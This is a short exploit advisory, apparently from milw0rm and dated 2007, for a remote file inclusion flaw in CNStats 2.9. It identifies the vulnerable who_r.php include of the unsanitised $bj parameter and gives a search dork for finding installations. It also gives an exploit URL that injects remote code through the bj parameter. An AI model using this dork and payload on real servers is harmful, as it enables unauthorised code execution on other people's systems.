1 CNStats 2.9 (who_r.php) Remote File Include Vulnerability
2
3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4 # Scripts : CNStats 2.9
5 # Discovered By : irvian
6 # scripts site : http://www.cnstats.com/
7 # dork : "CNStats 2.9"
8 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9 bug found:
10
11 /reports/who_r.php
12 /reports/who_s.php
13
14 $bk = ’t’;
15 include $bj . ’reports/who.php’;
16
17
18 Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
19
20 # milw0rm.com [2007−04−15]
Page 1/1
CNStats 2.9 who_r.php bj Remote File Inclusion Vulnerability
irvian
04/15/2007